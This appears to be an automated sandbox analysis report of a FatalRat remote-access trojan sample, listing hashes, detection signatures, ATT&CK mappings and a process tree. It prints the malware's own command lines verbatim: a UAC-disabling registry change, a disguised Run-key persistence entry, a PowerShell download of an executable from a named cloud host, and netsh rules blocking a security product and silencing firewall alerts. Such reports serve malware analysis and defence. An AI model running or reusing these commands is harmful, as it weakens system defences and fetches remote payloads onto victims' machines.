Analysis
max time kernel: 119s
max time network: 152s
platform: windows7_x64
resource: win7-20241023-en
resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
submitted: 23/02/2025, 12:47
Static task: static1
Behavioral task: behavioral1
  Sample: 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
  Resource: win7-20241023-en
Behavioral task: behavioral2
  Sample: 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
  Resource: win10v2004-20250217-en
General
Target: 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
Size: 20.0MB
MD5: f999f60afb55137a3c068a707a421a5f
SHA1: 15f5a8d7930cef9479caf9ecc2dd2c2d8f1efb32
SHA256: b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
SHA512: 24a7ffcec017937eec514a2bf2d1d36632abb829ece9fe59c63decb4c07e52f3a0ae8d09c8e7f61fa0f7fa1ecef5fdae8702ab48a09266391969fb71b85fbe4c
SSDEEP: 196608:patpgF2oM7Vk96Cy8xEqn0SweKG8UvMGnsOTMk:otpgF2oM7Vk96Cy8xEqn0MlDvtnsO4
Malware Config
Extracted URL: https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe
Signatures
- Fatalrat family

- UAC bypass (3 TTPs, 1 IoC)
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe

- Fatal Rat payload (1 IoC)
  resource | yara_rule
  behavioral1/memory/2768-93-0x00000000004D0000-0x00000000004F9000-memory.dmp | fatalrat

- Blocklisted process makes network request (2 IoCs)
  flow | pid | Process
  17 | 544 | powershell.exe
  18 | 544 | powershell.exe

- Downloads MZ/PE file (1 IoC)
  flow | pid | Process
  17 | 544 | powershell.exe

- Modifies Windows Firewall (2 TTPs, 8 IoCs)
  pid | Process
  1036 | netsh.exe
  2428 | netsh.exe
  2096 | netsh.exe
  2292 | netsh.exe
  1072 | netsh.exe
  1980 | netsh.exe
  708 | netsh.exe
  1348 | netsh.exe

- Executes dropped EXE (1 IoC)
  pid | Process
  2768 | Agghosts.exe

- Loads dropped DLL (1 IoC)
  pid | Process
  2768 | Agghosts.exe

- Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | reg.exe

- Command and Scripting Interpreter: PowerShell
  pid | Process
  544 | powershell.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Event Triggered Execution: Netsh Helper DLL (1 TTP, 24 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description | ioc | Process
  Key opened (8 entries) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
  Key queried (8 entries) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
  Key value enumerated (8 entries) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe

- System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Agghosts.exe

- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Agghosts.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | Agghosts.exe

- Suspicious behavior: EnumeratesProcesses (59 IoCs)
  pid | Process
  2360 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe (7 entries)
  544 | powershell.exe (1 entry)
  2768 | Agghosts.exe (51 entries, the remainder of the 59)

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2768 | Agghosts.exe
  Token: SeDebugPrivilege | 544 | powershell.exe

- Suspicious use of WriteProcessMemory (49 IoCs; each row is repeated as many times as noted)
  description | pid | Process | procid_target
  PID 2360 wrote to memory of 2708 (3 entries) | 2360 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 32
  PID 2360 wrote to memory of 2768 (4 entries) | 2360 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 34
  PID 2708 wrote to memory of 2508 (3 entries) | 2708 | cmd.exe | 35
  PID 2360 wrote to memory of 920 (3 entries) | 2360 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 36
  PID 2360 wrote to memory of 2432 (3 entries) | 2360 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 38
  PID 2360 wrote to memory of 1440 (3 entries) | 2360 | 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | 40
  PID 2432 wrote to memory of 3004 (3 entries) | 2432 | cmd.exe | 42
  PID 2432 wrote to memory of 544 (3 entries) | 2432 | cmd.exe | 43
  PID 1440 wrote to memory of 2428 (3 entries) | 1440 | cmd.exe | 44
  PID 1440 wrote to memory of 2096 (3 entries) | 1440 | cmd.exe | 45
  PID 1440 wrote to memory of 2292 (3 entries) | 1440 | cmd.exe | 46
  PID 1440 wrote to memory of 1072 (3 entries) | 1440 | cmd.exe | 47
  PID 1440 wrote to memory of 1980 (3 entries) | 1440 | cmd.exe | 48
  PID 1440 wrote to memory of 708 (3 entries) | 1440 | cmd.exe | 49
  PID 1440 wrote to memory of 1348 (3 entries) | 1440 | cmd.exe | 50
  PID 1440 wrote to memory of 1036 (3 entries) | 1440 | cmd.exe | 51
Processes
[1] C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2360

    [2] C:\Windows\system32\cmd.exe
        Command line: cmd /c ""C:\Users\Public\Downloads\20250223024744\1.bat" "
        - Suspicious use of WriteProcessMemory
        PID:2708

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
            - UAC bypass
            PID:2508

    [2] C:\programdata\20250223024744\Agghosts.exe
        Command line: "C:\programdata\20250223024744\Agghosts.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Checks processor information in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:2768

    [2] C:\Windows\System32\reg.exe
        Command line: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
        - Adds Run key to start application
        PID:920

    [2] C:\Windows\system32\cmd.exe
        Command line: cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
        - Suspicious use of WriteProcessMemory
        PID:2432

        [3] C:\Windows\system32\chcp.com
            Command line: chcp 65001
            PID:3004

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
            - Blocklisted process makes network request
            - Downloads MZ/PE file
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:544

    [2] C:\Windows\system32\cmd.exe
        Command line: cmd /c ""C:\Users\Public\Downloads\20250223024744\fhq.bat" "
        - Suspicious use of WriteProcessMemory
        PID:1440

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:2428

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:2096

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:2292

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:1072

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall set allprofiles state on
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:1980

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall set privateprofile settings inboundusernotification disable
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:708

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall set publicprofile settings inboundusernotification disable
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:1348

        [3] C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall set domainprofile settings inboundusernotification disable
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID:1036
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (2): Disable or Modify System Firewall (1), Disable or Modify Tools (1)
- Modify Registry (2)
Downloads
- Filesize: 2.7MB
  MD5: 2a24dcd41bc3c5b5f7eceda525786578
  SHA1: 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
  SHA256: 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
  SHA512: aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

- Filesize: 1KB
  MD5: 6fad1bf37c81f67455cf0a0c58a36ed0
  SHA1: 16c12891c7a03ecc7368e27fa66e2b9bc82358a2
  SHA256: 1e3dd035f7298068310ff06f8d4387cc239084a1590233fed5100663a1a70b81
  SHA512: 2a1cebe1f6760ca088402b4c9725f706f16cd194d332c9c36415fc726504bea253319c1a6c85f20d32f2d42e71ff057a6fcab6baccc5d5871dbc30f231dd8139

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5: 38267d023abd6bf6c8425b2bc43be18a
  SHA1: 58f70c76e62487e0ec7c66a0ebb2efadcc698f8b
  SHA256: e9e94a30b36ca3fe3f93ecccbd53cb822c0c21cb41515a7d447f461558704de1
  SHA512: e668f7c113938bf165ee0bc02b006dc2311085208962fa5b5a80f92487538db3684413c475119cd4b6a4900b2f07cfc84b2a44c0382d3e02cb30bf66fd8c8b7b

- Filesize: 70KB
  MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1: 1723be06719828dda65ad804298d0431f6aff976
  SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

- Filesize: 181KB
  MD5: 4ea6026cf93ec6338144661bf1202cd1
  SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

- Filesize: 229B
  MD5: fa42ebb1071abc0e618c296ea2cf71a6
  SHA1: 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
  SHA256: 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
  SHA512: 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

- Filesize: 1KB
  MD5: 3a7cb580bd340505f6dc5b4c829a3eca
  SHA1: 21cc730517d74fa1d13316d7e0d817f3bd710906
  SHA256: 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
  SHA512: c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

- Filesize: 415B
  MD5: a90ccfd040d774b547f7d258b8e03661
  SHA1: c46e353d34723f9393482974a516d51dfb52440d
  SHA256: d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
  SHA512: bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

- Filesize: 192KB
  MD5: 2fd94f6e1d71454d716a126f0d7450ac
  SHA1: 5d966df95c741880089e9078af921a22216516ec
  SHA256: a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
  SHA512: 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

- Filesize: 1.9MB
  MD5: b7f8c3416cdfd6f46c790da064f66099
  SHA1: d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
  SHA256: b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
  SHA512: 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7